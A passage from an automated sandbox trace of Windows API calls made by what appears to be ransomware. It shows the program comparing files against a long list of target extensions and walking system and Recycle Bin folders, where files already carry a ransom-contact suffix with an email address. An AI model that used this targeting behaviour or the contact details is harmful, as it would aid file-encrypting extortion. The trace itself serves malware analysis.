(lpString1=".jpeg", lpString2="].bat") returned -1 [0155.270] lstrlenW (lpString=".jpf") returned 4 [0155.270] lstrcmpiW (lpString1=".jpf", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".jpg") returned 4 [0155.270] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".jpx") returned 4 [0155.270] lstrcmpiW (lpString1=".jpx", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".js") returned 3 [0155.270] lstrcmpiW (lpString1=".js", lpString2="bat") returned -1 [0155.270] lstrlenW (lpString=".jsf") returned 4 [0155.270] lstrcmpiW (lpString1=".jsf", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".json") returned 5 [0155.270] lstrcmpiW (lpString1=".json", lpString2="].bat") returned -1 [0155.270] lstrlenW (lpString=".jsp") returned 4 [0155.270] lstrcmpiW (lpString1=".jsp", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".kdc") returned 4 [0155.270] lstrcmpiW (lpString1=".kdc", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".kmz") returned 4 [0155.270] lstrcmpiW (lpString1=".kmz", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".kwm") returned 4 [0155.271] lstrcmpiW (lpString1=".kwm", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".lasso") returned 6 [0155.271] lstrcmpiW (lpString1=".lasso", lpString2="i].bat") returned -1 [0155.271] lstrlenW (lpString=".lbi") returned 4 [0155.271] lstrcmpiW (lpString1=".lbi", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".lgf") returned 4 [0155.271] lstrcmpiW (lpString1=".lgf", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".lgp") returned 4 [0155.271] lstrcmpiW (lpString1=".lgp", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".log") returned 4 [0155.271] lstrcmpiW (lpString1=".log", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".m1v") returned 4 [0155.271] lstrcmpiW (lpString1=".m1v", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".m4a") returned 4 [0155.271] lstrcmpiW (lpString1=".m4a", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".m4v") returned 4 [0155.271] lstrcmpiW (lpString1=".m4v", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".max") returned 4 [0155.271] lstrcmpiW (lpString1=".max", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".md") returned 3 [0155.271] lstrcmpiW (lpString1=".md", lpString2="bat") returned -1 [0155.271] lstrlenW (lpString=".mda") returned 4 [0155.271] lstrcmpiW (lpString1=".mda", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".mdb") returned 4 [0155.271] lstrcmpiW (lpString1=".mdb", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".mde") returned 4 [0155.271] lstrcmpiW (lpString1=".mde", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".mdf") returned 4 [0155.271] lstrcmpiW (lpString1=".mdf", lpString2=".bat") returned 1 [0155.271] lstrlenW (lpString=".mdw") returned 4 [0155.271] lstrcmpiW (lpString1=".mdw", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mef") returned 4 [0155.272] lstrcmpiW (lpString1=".mef", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mft") returned 4 [0155.272] lstrcmpiW (lpString1=".mft", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mfw") returned 4 [0155.272] lstrcmpiW (lpString1=".mfw", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mht") returned 4 [0155.272] lstrcmpiW (lpString1=".mht", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mhtml") returned 6 [0155.272] lstrcmpiW (lpString1=".mhtml", lpString2="i].bat") returned -1 [0155.272] lstrlenW (lpString=".mka") returned 4 [0155.272] lstrcmpiW (lpString1=".mka", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mkidx") returned 6 [0155.272] lstrcmpiW (lpString1=".mkidx", lpString2="i].bat") returned -1 [0155.272] lstrlenW (lpString=".mkv") returned 4 [0155.272] lstrcmpiW (lpString1=".mkv", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mos") returned 4 [0155.272] lstrcmpiW (lpString1=".mos", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mov") returned 4 [0155.272] lstrcmpiW (lpString1=".mov", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mp3") returned 4 [0155.272] lstrcmpiW (lpString1=".mp3", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mp4") returned 4 [0155.272] lstrcmpiW (lpString1=".mp4", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mpeg") returned 5 [0155.272] lstrcmpiW (lpString1=".mpeg", lpString2="].bat") returned -1 [0155.272] lstrlenW (lpString=".mpg") returned 4 [0155.272] lstrcmpiW (lpString1=".mpg", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mpv") returned 4 [0155.272] lstrcmpiW (lpString1=".mpv", lpString2=".bat") returned 1 [0155.272] lstrlenW (lpString=".mrw") returned 4 [0155.272] lstrcmpiW (lpString1=".mrw", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".msg") returned 4 [0155.273] lstrcmpiW (lpString1=".msg", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".mxl") returned 4 [0155.273] lstrcmpiW (lpString1=".mxl", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".myd") returned 4 [0155.273] lstrcmpiW (lpString1=".myd", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".myi") returned 4 [0155.273] lstrcmpiW (lpString1=".myi", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".nef") returned 4 [0155.273] lstrcmpiW (lpString1=".nef", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".nrw") returned 4 [0155.273] lstrcmpiW (lpString1=".nrw", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".obj") returned 4 [0155.273] lstrcmpiW (lpString1=".obj", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".odb") returned 4 [0155.273] lstrcmpiW (lpString1=".odb", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".odc") returned 4 [0155.273] lstrcmpiW (lpString1=".odc", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".odm") returned 4 [0155.273] lstrcmpiW (lpString1=".odm", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".odp") returned 4 [0155.273] lstrcmpiW (lpString1=".odp", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".ods") returned 4 [0155.273] lstrcmpiW (lpString1=".ods", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".oft") returned 4 [0155.273] lstrcmpiW (lpString1=".oft", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".one") returned 4 [0155.273] lstrcmpiW (lpString1=".one", lpString2=".bat") returned 1 [0155.273] lstrlenW (lpString=".onepkg") returned 7 [0155.273] lstrcmpiW (lpString1=".onepkg", lpString2="li].bat") returned -1 [0155.273] lstrlenW (lpString=".onetoc2") returned 8 [0155.273] lstrcmpiW (lpString1=".onetoc2", lpString2=".li].bat") returned 1 [0155.273] lstrlenW (lpString=".opt") returned 4 [0155.273] lstrcmpiW (lpString1=".opt", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".oqy") returned 4 [0155.274] lstrcmpiW (lpString1=".oqy", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".orf") returned 4 [0155.274] lstrcmpiW (lpString1=".orf", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".p12") returned 4 [0155.274] lstrcmpiW (lpString1=".p12", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".p7b") returned 4 [0155.274] lstrcmpiW (lpString1=".p7b", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".p7c") returned 4 [0155.274] lstrcmpiW (lpString1=".p7c", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pam") returned 4 [0155.274] lstrcmpiW (lpString1=".pam", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pbm") returned 4 [0155.274] lstrcmpiW (lpString1=".pbm", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pct") returned 4 [0155.274] lstrcmpiW (lpString1=".pct", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pcx") returned 4 [0155.274] lstrcmpiW (lpString1=".pcx", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pdd") returned 4 [0155.274] lstrcmpiW (lpString1=".pdd", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pdf") returned 4 [0155.274] lstrcmpiW (lpString1=".pdf", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pdp") returned 4 [0155.274] lstrcmpiW (lpString1=".pdp", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pef") returned 4 [0155.274] lstrcmpiW (lpString1=".pef", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pem") returned 4 [0155.274] lstrcmpiW (lpString1=".pem", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pff") returned 4 [0155.274] lstrcmpiW (lpString1=".pff", lpString2=".bat") returned 1 [0155.274] lstrlenW (lpString=".pfm") returned 4 [0155.274] lstrcmpiW (lpString1=".pfm", lpString2=".bat") returned 1 [0155.275] lstrlenW (lpString=".pfx") returned 4 [0155.275] lstrcmpiW (lpString1=".pfx", lpString2=".bat") returned 1 [0155.275] lstrlenW (lpString=".pgm") returned 4 [0155.275] lstrcmpiW (lpString1=".pgm", lpString2=".bat") returned 1 [0155.275] lstrlenW (lpString=".php") returned 4 [0155.275] lstrcmpiW (lpString1=".php", lpString2=".bat") returned 1 [0155.275] lstrlenW (lpString=".php3") returned 5 [0155.275] lstrcmpiW (lpString1=".php3", lpString2="].bat") returned -1 [0155.275] lstrlenW (lpString=".php4") returned 5 [0155.275] lstrcmpiW (lpString1=".php4", lpString2="].bat") returned -1 [0155.275] lstrlenW (lpString=".php5") returned 5 [0155.275] lstrcmpiW (lpString1=".php5", lpString2="].bat") returned -1 [0155.275] lstrlenW (lpString=".phtml") returned 6 [0155.275] lstrcmpiW (lpString1=".phtml", lpString2="i].bat") returned -1 [0155.275] lstrlenW (lpString=".pict") returned 5 [0155.275] lstrcmpiW (lpString1=".pict", lpString2="].bat") returned -1 [0155.275] lstrlenW (lpString=".pl") returned 3 [0155.275] lstrcmpiW (lpString1=".pl", lpString2="bat") returned -1 [0155.275] lstrlenW (lpString=".pls") returned 4 [0155.275] lstrcmpiW (lpString1=".pls", lpString2=".bat") returned 1 [0155.275] lstrlenW (lpString=".pm") returned 3 [0155.275] lstrcmpiW (lpString1=".pm", lpString2="bat") returned -1 [0155.275] lstrlenW (lpString=".png") returned 4 [0155.275] lstrcmpiW (lpString1=".png", lpString2=".bat") returned 1 [0155.275] lstrlenW (lpString=".pnm") returned 4 [0155.275] lstrcmpiW (lpString1=".pnm", lpString2=".bat") returned 1 [0155.275] lstrlenW (lpString=".pot") returned 4 [0155.275] lstrcmpiW (lpString1=".pot", lpString2=".bat") returned 1 [0155.275] lstrlenW (lpString=".potm") returned 5 [0155.275] lstrcmpiW (lpString1=".potm", lpString2="].bat") returned -1 [0155.275] lstrlenW (lpString=".potx") returned 5 [0155.275] lstrcmpiW (lpString1=".potx", lpString2="].bat") returned -1 [0155.275] lstrlenW (lpString=".ppa") returned 4 [0155.276] lstrcmpiW (lpString1=".ppa", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".ppam") returned 5 [0155.276] lstrcmpiW (lpString1=".ppam", lpString2="].bat") returned -1 [0155.276] lstrlenW (lpString=".ppm") returned 4 [0155.276] lstrcmpiW (lpString1=".ppm", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".pps") returned 4 [0155.276] lstrcmpiW (lpString1=".pps", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".ppsm") returned 5 [0155.276] lstrcmpiW (lpString1=".ppsm", lpString2="].bat") returned -1 [0155.276] lstrlenW (lpString=".ppt") returned 4 [0155.276] lstrcmpiW (lpString1=".ppt", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".pptm") returned 5 [0155.276] lstrcmpiW (lpString1=".pptm", lpString2="].bat") returned -1 [0155.276] lstrlenW (lpString=".pptx") returned 5 [0155.276] lstrcmpiW (lpString1=".pptx", lpString2="].bat") returned -1 [0155.276] lstrlenW (lpString=".prn") returned 4 [0155.276] lstrcmpiW (lpString1=".prn", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".ps") returned 3 [0155.276] lstrcmpiW (lpString1=".ps", lpString2="bat") returned -1 [0155.276] lstrlenW (lpString=".psb") returned 4 [0155.276] lstrcmpiW (lpString1=".psb", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".psd") returned 4 [0155.276] lstrcmpiW (lpString1=".psd", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".pst") returned 4 [0155.276] lstrcmpiW (lpString1=".pst", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".ptx") returned 4 [0155.276] lstrcmpiW (lpString1=".ptx", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".pub") returned 4 [0155.276] lstrcmpiW (lpString1=".pub", lpString2=".bat") returned 1 [0155.276] lstrlenW (lpString=".pwm") returned 4 [0155.276] lstrcmpiW (lpString1=".pwm", lpString2=".bat") returned 1 [0155.277] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd39c503, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd39c503, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd39c503, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1894, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="oobe_2017_09_07_03_08_57_737.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="OOBE_2~1.BAT")) returned 1 [0155.277] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd21ec45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd21ec45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd26b034, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARTNE~1.BAT")) returned 1 [0155.277] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd21ec45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd21ec45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd26b034, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARTNE~1.BAT")) returned 0 [0155.277] FindClose (in: hFindFile=0x6ba1f0 | out: hFindFile=0x6ba1f0) returned 1 [0155.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e1060 | out: hHeap=0x6a0000) returned 1 [0155.284] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0155.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e1060 [0155.284] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName=".", cAlternateFileName="")) returned 0x6ba1f0 [0155.285] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="..", cAlternateFileName="")) returned 1 [0155.285] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcb6a1de, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcb6a1de, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0ed8ee, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x233c8, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="GetCurrentOOBE.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="GETCUR~1.BAT")) returned 1 [0155.285] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf49f2d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcf49f2d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfcf70119, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="GetCurrentRollback.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="GETCUR~2.BAT")) returned 1 [0155.285] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcb6a1de, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcb6a1de, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfcf49f2d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="PartnerSetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARTNE~1.BAT")) returned 1 [0155.285] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd07b1b1, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd07b1b1, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd07b1b1, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="preoobe.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PREOOB~1.BAT")) returned 1 [0155.285] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcaab581, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcaab581, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfcb43f4a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="SetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPC~1.BAT")) returned 1 [0155.285] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcaab581, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcaab581, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfcb43f4a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="SetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPC~1.BAT")) returned 0 [0155.285] FindClose (in: hFindFile=0x6ba1f0 | out: hFindFile=0x6ba1f0) returned 1 [0155.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e1060 | out: hHeap=0x6a0000) returned 1 [0155.286] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0155.286] FindClose (in: hFindFile=0x6ba1b0 | out: hFindFile=0x6ba1b0) returned 1 [0155.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0155.287] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0155.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0155.288] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName=".", cAlternateFileName="")) returned 0x6ba1b0 [0155.289] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="..", cAlternateFileName="")) returned 1 [0155.289] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0155.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.289] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x16, ftLastAccessTime.dwLowDateTime=0x2, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="\xeb27\xffff\x5448\x72\x1ff", cAlternateFileName="\x9170\x70\x08")) returned 0xffffffff [0155.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.289] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0155.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.289] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x6ba1f0 [0155.289] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.289] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x95b8e1dc, ftCreationTime.dwHighDateTime=0x1d50396, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, 